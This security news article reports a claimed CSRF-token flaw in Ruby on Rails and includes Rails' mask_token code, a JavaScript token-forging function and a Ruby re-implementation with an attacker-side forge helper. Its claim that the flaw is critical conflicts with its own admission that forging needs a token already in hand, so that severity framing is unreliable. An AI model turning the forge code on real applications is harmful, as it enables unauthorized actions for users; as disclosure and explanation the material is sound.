Security experts revealed a critical vulnerability in Ruby on Rails that allows attackers to bypass Cross-Site Request Forgery (CSRF) protections.
The flaw, disclosed on April 26, 2025, affects all current versions of the popular web framework and every version released since the 2022/2023 fix for similar issues.
The vulnerability stems from the way Rails builds its CSRF tokens. The framework generates each token by XORing a random "one-time pad" (OTP) with a "raw token."
However, Rails then packages the OTP and the XORed token together by simple concatenation, producing what it calls a "masked token."
Because the pad travels with the XORed data, anyone who obtains a masked token can recover the raw token and mint further masked tokens that the server will accept; the masking adds no secrecy beyond that of the raw token itself.
With the XOR key (the OTP) sent alongside the data it was applied to, the XOR step provides no confidentiality at all.
Analysts and researchers following the disclosure on Seclists noted that this vulnerability represents a significant security risk for the thousands of websites built with Rails.
The flaw effectively nullifies a critical security layer that many developers rely on to protect their applications from malicious actors.
The vulnerability was first reported by security researcher Daniel Owens, who provided comprehensive evidence of the flaw.
His disclosure indicates this is essentially the same vulnerability that Rails developers believed they had fixed in updates released in 2022/2023.
Technical Analysis of the Vulnerability

The technical root of the vulnerability lies in the mask_token method within the Rails codebase. This method creates the "masked" version of the authenticity token, which is meant to vary with each request in order to mitigate TLS compression side-channel attacks such as BREACH.
The problematic implementation can be seen in the following code snippet:
def mask_token(raw_token)
  one_time_pad = SecureRandom.random_bytes(AUTHENTICITY_TOKEN_LENGTH)
  encrypted_csrf_token = xor_byte_strings(one_time_pad, raw_token)
  masked_token = one_time_pad + encrypted_csrf_token
  encode_csrf_token(masked_token)
end

As this code shows, Rails generates a random one-time pad and uses it to encrypt the raw token with an XOR operation.
It then simply concatenates the encryption key with the encrypted data before sending it to users, violating a fundamental principle of cryptographic security.
Owens demonstrated the vulnerability with JavaScript code that, given the pad and the raw token as equal-length byte arrays, forges a new masked token in the format Rails expects (pad bytes followed by XORed bytes, Base64-encoded with the padding stripped):

function getCsrfToken(otp, raw_token) {
    // XOR each raw-token byte with the corresponding pad byte
    var masked_token = new Uint8Array(raw_token.length);
    for (var i = 0; i < raw_token.length; i++) {
        masked_token[i] = otp[i] ^ raw_token[i];
    }
    // Rails expects the pad first, then the XORed token
    var bytes = new Uint8Array(otp.length + masked_token.length);
    bytes.set(otp, 0);
    bytes.set(masked_token, otp.length);
    return btoa(Array.from(bytes).map(b => String.fromCharCode(b)).join('')).replace(/=+$/, '');
}

Any party who already holds the raw token, or a masked token from which it can be recovered, can use this to craft requests that pass Rails' CSRF check, leading to unauthorized actions performed on behalf of authenticated users of vulnerable applications.
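To make both the server-side scheme and the forge concrete, the following is an added, stand-alone Ruby re-implementation written for this article; it is not code from Rails or from Owens' disclosure. It reproduces the masking shown above (random pad XORed with a 32-byte raw token, pad prepended, URL-safe Base64 without padding), adds the unmasking a server has to perform to check a submitted token, and shows the attacker-side forge. The helper names unmask_token, valid_masked_token?, secure_compare and forge_from_masked are assumptions for this example, not Rails APIs. Note the check a practitioner should keep in mind: forge_from_masked needs a masked token as input, so the pad gives away nothing that the holder of that token did not already possess.

```ruby
require "securerandom"

# Added example, not Rails' own code: the masking scheme described in the
# article, re-implemented so its properties can be observed directly.
AUTHENTICITY_TOKEN_LENGTH = 32

# Byte-wise XOR of two equal-length binary strings (same construction Rails uses).
def xor_byte_strings(s1, s2)
  s1.bytes.zip(s2.bytes).map { |a, b| a ^ b }.pack("C*")
end

# URL-safe Base64 without "=" padding, built from pack/unpack to avoid a gem dependency.
def encode_csrf_token(bytes)
  [bytes].pack("m0").tr("+/", "-_").delete("=")
end

def decode_csrf_token(str)
  b64 = str.tr("-_", "+/")
  b64 += "=" * ((4 - b64.length % 4) % 4)
  b64.unpack1("m0")
end

# Same steps as the Rails mask_token shown in the article: fresh pad, XOR, concatenate.
def mask_token(raw_token)
  one_time_pad = SecureRandom.random_bytes(AUTHENTICITY_TOKEN_LENGTH)
  encrypted_csrf_token = xor_byte_strings(one_time_pad, raw_token)
  encode_csrf_token(one_time_pad + encrypted_csrf_token)
end

# Server side (assumed helper): split off the pad and XOR it back out.
# The pad has to be transmitted because this step needs it; it is not a secret key.
def unmask_token(masked_token)
  bytes = decode_csrf_token(masked_token)
  return nil unless bytes.bytesize == 2 * AUTHENTICITY_TOKEN_LENGTH
  pad = bytes[0, AUTHENTICITY_TOKEN_LENGTH]
  encrypted = bytes[AUTHENTICITY_TOKEN_LENGTH, AUTHENTICITY_TOKEN_LENGTH]
  xor_byte_strings(pad, encrypted)
end

# Constant-time comparison (assumed helper) so the check cannot leak the raw
# token one byte at a time through timing.
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Server side (assumed helper): a submitted masked token is valid when it
# unmasks to the raw token stored in the session.
def valid_masked_token?(masked_token, session_raw_token)
  unmasked = unmask_token(masked_token)
  !unmasked.nil? && secure_compare(unmasked, session_raw_token)
end

# Attacker side (assumed helper): whoever holds one masked token can recover
# the raw token and mint fresh masked tokens that valid_masked_token? accepts.
# Without a masked (or raw) token in hand there is nothing to recover the pad from.
def forge_from_masked(masked_token)
  mask_token(unmask_token(masked_token))
end

if __FILE__ == $PROGRAM_NAME
  raw = SecureRandom.random_bytes(AUTHENTICITY_TOKEN_LENGTH)   # constructed session secret
  issued = mask_token(raw)
  forged = forge_from_masked(issued)
  puts "issued: #{issued}"
  puts "forged: #{forged}"
  puts "forged token accepted: #{valid_masked_token?(forged, raw)}"
end
```

Running it prints two different masked tokens (the per-request variation that defeats BREACH) and reports that the forged one is accepted, because both unmask to the same raw token. The length check in unmask_token and the constant-time compare are the two defensive details worth carrying into any verifier of this format.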